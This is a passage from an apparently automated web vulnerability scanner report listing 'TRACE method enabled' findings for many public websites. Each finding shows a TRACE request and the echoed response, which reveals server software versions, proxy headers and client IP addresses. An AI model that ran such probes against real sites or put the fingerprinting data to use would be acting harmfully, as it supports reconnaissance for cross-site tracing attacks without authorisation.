TRACE / HTTP/1.0
Host: www.roxwel.com
Cookie: 22e781c55d91754c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:07 GMT
Server: Apache/2.2.16 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.roxwel.com
Cookie: 22e781c55d91754c

21.201. http://www.salon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.salon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.salon.com
Cookie: 8da2e072bced114e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.salon.com
Cookie: 8da2e072bced114e
X-Forwarded-For: 173.193.214.243

21.202. http://www.sbnation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sbnation.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sbnation.com
Cookie: ec9c73aa0e3318c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:46 GMT
Server: Apache
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sbnation.com
Cookie: ec9c73aa0e3318c
X-Forwarded-For: 173.193.214.243

21.203. http://www.sfgate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sfgate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sfgate.com
Cookie: 46d631815af14745

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:15 GMT
Server: Apache/2.2.16 (Linux/SUSE) DAV/2 mod_fcgid/2.3.5 mod_perl/2.0.4 Perl/v5.12.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sfgate.com
Cookie: 46d631815af14745

21.204. http://www.sheknows.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sheknows.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sheknows.com
Cookie: 259c52f4f98eba7

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:24 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
X-Forwarded-For: 10.2.10.96, 173.193.214.243
Host: www.sheknows.com
Cookie: 259c52f4f98eba7

21.205. http://www.simplyrecipes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyrecipes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.simplyrecipes.com
Cookie: a114b065d247fec0

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:24 GMT
Server: Apache
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.simplyrecipes.com
Cookie: a114b065d247fec0

21.206. http://www.sing365.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sing365.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sing365.com
Cookie: 2b5d3cb5932a22f9

Response

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Sat, 02 Apr 2011 11:20:18 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 11:20:18 GMT
Content-Type: message/http
Content-Length: 132
Connection: close

TRACE / HTTP/1.0
Host: www.sing365.com
Cookie: 2b5d3cb5932a22f9
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=172800
21.207. http://www.siteencore.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siteencore.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.siteencore.com
Cookie: 10517938343ad66c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.siteencore.com
Cookie: 10517938343ad66c

21.208. http://www.smarter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smarter.com
Cookie: 3647e540a13dae24

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.smarter.com
Cookie: 3647e540a13dae24
Connection: Keep-Alive
rlnclientipaddr: 173.193.214.243

21.209. http://www.smileycentral.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smileycentral.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smileycentral.com
Cookie: d6340205efc7955c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:21 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d6340205efc7955c
Host: www.smileycentral.com
X-Jabodo-For: 173.193.214.243

21.210. http://www.snopes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snopes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.snopes.com
Cookie: 3f182454063c316c

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 14:34:58 GMT
Content-Type: message/http
Content-Length: 68

TRACE / HTTP/1.0
Host: www.snopes.com
Cookie: 3f182454063c316c

21.211. http://www.socialsecurity.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsecurity.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.socialsecurity.gov
Cookie: 28c7e3bab3c9d0fd

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:43:57 GMT
Cache-control: public
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.socialsecurity.gov
Cookie: 28c7e3bab3c9d0fd

21.212. http://www.soft82.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.soft82.com
Cookie: a252889f4e5511b8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a252889f4e5511b8
Host: www.soft82.com

21.213. http://www.songlyrics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songlyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.songlyrics.com
Cookie: 20cf55cc50e65d01

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.songlyrics.com
Cookie: 20cf55cc50e65d01

21.214. http://www.spanishdict.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.spanishdict.com
Cookie: ffa0285337569b7e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.spanishdict.com
Cookie: ffa0285337569b7e

21.215. http://www.squidoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.squidoo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.squidoo.com
Cookie: 467f36368c93695d

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 126
Date: Sat, 02 Apr 2011 12:44:00 GMT
X-Varnish: 1710142468
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.squidoo.com
Cookie: 467f36368c93695d
X-Forwarded-For: 173.193.214.243
X-Varnish: 1710142468

21.216. http://www.ssa.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ssa.gov
Cookie: 5d8921970ca185ec

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:34:30 GMT
Cache-control: public
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.ssa.gov
Cookie: 5d8921970ca185ec

21.217. http://www.starpulse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starpulse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.starpulse.com
Cookie: 854e1019a6cfdbcc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:05 GMT
Server: Apache/2.2.15 (FreeBSD) PHP/5.3.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.starpulse.com
Cookie: 854e1019a6cfdbcc

21.218. http://www.steadyhealth.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.steadyhealth.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.steadyhealth.com
Cookie: ea78eff618711338

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.steadyhealth.com
Cookie: ea78eff618711338

21.219. http://www.stlyrics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stlyrics.com
Cookie: 6e1901f6f6372201

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stlyrics.com
Cookie: 6e1901f6f6372201

21.220. http://www.stumbleupon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 9865fc5089468fbf

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 177
Date: Sat, 02 Apr 2011 12:38:08 GMT
X-Varnish: 996708376
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 9865fc5089468fbf
X-Forwarded-For: 173.193.214.243
host: www.stumbleupon.com
X-Pool-Chosen: default
X-Varnish: 996708376
Connection: keep-alive

21.221. http://www.stylelist.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stylelist.com
Cookie: 66cf114472725996

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stylelist.com
Cookie: 66cf114472725996
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:27:E1A2:200483,x-lb-client-ip:ajg_u

21.222. http://www.suite101.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.suite101.com
Cookie: 89984e8a11408d45

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:43 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Connection: close
Content-Type: message/http
Set-Cookie: Coyote-2-455a6255=455a625b:0; expires=Sat, 02-Apr-11 13:01:40 GMT; path=/

TRACE / HTTP/1.0
Host: www.suite101.com
Cookie: 89984e8a11408d45

21.223. http://www.suntimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.suntimes.com
Cookie: 82cc3576990e3f0d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: SUNT=SUNT_ECP14; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.suntimes.com
Cookie: 82cc3576990e3f0d
X-Forwarded-For: 173.193.214.243

21.224. http://www.superiorpics.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superiorpics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.superiorpics.com
Cookie: 14c9478ac982aac5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:40 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 14c9478ac982aac5
Host: www.superiorpics.com

21.225. http://www.tagged.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 40e756b428f5692e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 40e756b428f5692e
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

21.226. http://www.talkingpointsmemo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.talkingpointsmemo.com
Cookie: 5893ada3a2267741

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:51:51 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-For: 173.193.214.243
Host: www.talkingpointsmemo.com
Cookie: 5893ada3a2267741
Connection: Keep-Alive

21.227. http://www.tarot.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tarot.com
Cookie: dc075948a58f07f6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:57 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tarot.com
Cookie: dc075948a58f07f6

21.228. http://www.tastebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tastebook.com
Cookie: f42aa521c303ad57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tastebook.com
Cookie: f42aa521c303ad57
X-Forwarded-Proto: http
X-Forwarded-For: 173.193.214.243

21.229. http://www.terra.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 62c143e7fb21f41c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 62c143e7fb21f41c

21.230. http://www.theepochtimes.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theepochtimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.theepochtimes.com
Cookie: 4152cd4d530380f5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.theepochtimes.com
Cookie: 4152cd4d530380f5
X-Varnish: 191880439
X-Forwarded-for: 173.193.214.243

21.231. http://www.thefind.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thefind.com
Cookie: 80f27d329c0af183

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thefind.com
Cookie: 80f27d329c0af183

21.232. http://www.theglobeandmail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.theglobeandmail.com
Cookie: 8302653af291e481

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: message/http
Content-Length: 130
Date: Sat, 02 Apr 2011 13:56:22 GMT
X-Varnish: 744761711
Age: 0
Via: 1.1 varnish
Connection: close
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

TRACE / HTTP/1.0
Host: www.theglobeandmail.com
Cookie: 8302653af291e481
X-Forwarded-For: 70.64.112.55
X-Varnish: 744761711

21.233. http://www.thegrids.info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegrids.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thegrids.info
Cookie: d78b879c1b680e97

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thegrids.info
Cookie: d78b879c1b680e97

21.234. http://www.thehollywoodgossip.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thehollywoodgossip.com
Cookie: 928ee341bfd3816b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:04 GMT
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thehollywoodgossip.com
Cookie: 928ee341bfd3816b

21.235. http://www.thomasnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thomasnet.com
Cookie: a6777426af8f0c04

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thomasnet.com
Cookie: a6777426af8f0c04

21.236. http://www.timeanddate.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeanddate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.timeanddate.com
Cookie: 922db769262c0813

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:59 GMT
Server: Apache/2.0.63
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

TRACE / HTTP/1.1
Host: www.timeanddate.com
Cookie: 922db769262c0813
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY005-ASHB.COTENDO.NET (chpd/3.06.0052)

21.237. http://www.tmz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: 9b2719aa7bddf242

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: 9b2719aa7bddf242
X-Forwarded-For: 173.193.214.243

21.238. http://www.tomshardware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomshardware.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tomshardware.com
Cookie: 8e14e657507cb9ab

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:38:59 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: close

TRACE / HTTP/1.0
Host: www.tomshardware.com
Cookie: 8e14e657507cb9ab
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=0

21.239. http://www.toptenreviews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.toptenreviews.com
Cookie: f98c66531054e4d8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.toptenreviews.com
Cookie: f98c66531054e4d8

21.240. http://www.tradekey.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tradekey.com
Cookie: a203086ed768691f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:06 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tradekey.com
Cookie: a203086ed768691f

21.241. http://www.travelpod.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.travelpod.com
Cookie: ab4a451b8fa83901

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.travelpod.com
Cookie: ab4a451b8fa83901

21.242. http://www.truste.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truste.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.truste.com
Cookie: c26c78965d384e64

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:07 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.truste.com
Cookie: c26c78965d384e64

21.243. http://www.twitlonger.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitlonger.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.twitlonger.com
Cookie: 680bdebd5902d2ac

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.twitlonger.com
Cookie: 680bdebd5902d2ac

21.244. http://www.ucomparehealthcare.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucomparehealthcare.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ucomparehealthcare.com
Cookie: c72e712f30cc81e3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:07 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ucomparehealthcare.com
Cookie: c72e712f30cc81e3
Connection: Keep-Alive
CIPA: 173.193.214.243

21.245. http://www.ufl.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufl.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ufl.edu
Cookie: eb0ede8290745121

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ufl.edu
Cookie: eb0ede8290745121

21.246. http://www.use.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.use.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.use.com
Cookie: 99a22e438a5c7d80

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.use.com
Cookie: 99a22e438a5c7d80

21.247. http://www.usgs.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usgs.gov
Cookie: 4492d1bf428440ea

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Type: message/http
Content-Length: 99
Expires: Sat, 02 Apr 2011 13:45:32 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.usgs.gov
Cookie: 4492d1bf428440ea
_FP_X_URL: http://www.usgs.gov/

21.248. http://www.utube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.utube.com
Cookie: 10e916fe84ed360a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.utube.com
Cookie: 10e916fe84ed360a

21.249. http://www.veoh.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.veoh.com
Cookie: 87af5ed549619bac

Response

HTTP/1.1 200 OK
Set-Cookie: veohCookie="VisitorUID=BFCBC25C-4061-BC23-C8DE-541EF30FEA67&LastUpdate=02/Apr/2011:06:34:14 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:14 GMT; Path=/
Date: Sat, 02 Apr 2011 13:34:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: message/http

TRACE / HTTP/1.0
X-VEOH_TSTAMP: 1301751254773
Cookie: 87af5ed549619bac; veohCookie="VisitorUID=BFCBC25C-4061-BC23-C8DE-541EF30FEA67&LastUpdate=02/Apr/2011:06:34:14 -0700&first=1"
CLIENT_IP: 173.193.214.243
X-Cluster-Client-Ip: 173.193.214.243
Connection: Keep-Alive
H
...[SNIP]...
21.250. http://www.vimeo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vimeo.com
Cookie: f8cbbb405e0f663e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vimeo.com
Cookie: f8cbbb405e0f663e
X-Jabodo-For: 173.193.214.243

21.251. http://www.vitals.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vitals.com
Cookie: 9fb44a2b27e0c0cd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:09 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vitals.com
Cookie: 9fb44a2b27e0c0cd

21.252. http://www.wa.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wa.gov
Cookie: 4123a1a2673f99ca

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:28 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wa.gov
Cookie: 4123a1a2673f99ca

21.253. http://www.walletpop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.walletpop.com
Cookie: aa8ab9a9da412c5f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.walletpop.com
Cookie: aa8ab9a9da412c5f
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:17:622B:200483,x-lb-client-ip:ajg_u

21.254. http://www.wapedia.mobi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wapedia.mobi
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wapedia.mobi
Cookie: c62c5f12794df102

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wapedia.mobi
Cookie: c62c5f12794df102
X-Varnish: 1919134896
X-Forwarded-For: 173.193.214.243

21.255. http://www.washington.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.washington.edu
Cookie: 4c08f685915b2ae9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.washington.edu
Cookie: 4c08f685915b2ae9

21.256. http://www.weather.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
